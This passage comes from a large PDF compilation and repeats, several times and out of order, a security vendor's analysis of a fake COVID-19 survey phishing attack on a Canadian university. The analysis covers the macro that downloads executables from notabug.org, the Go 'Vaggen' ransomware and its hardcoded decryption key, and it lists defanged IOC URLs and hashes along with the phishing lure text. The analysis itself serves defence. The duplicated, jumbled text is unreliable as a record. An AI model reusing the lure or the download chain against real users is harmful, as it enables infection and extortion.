3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1425 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1426 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1427 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1428 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1429 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1430 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1431 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1432 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1433 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1434 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1435 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1436 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1437 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1438 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1439 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1440 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1441 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1442 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1443 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1444 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1445 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1446 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1447 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1448 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1449 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1450 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1451 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1452 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1453 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1454 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1455 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1456 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1457 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular 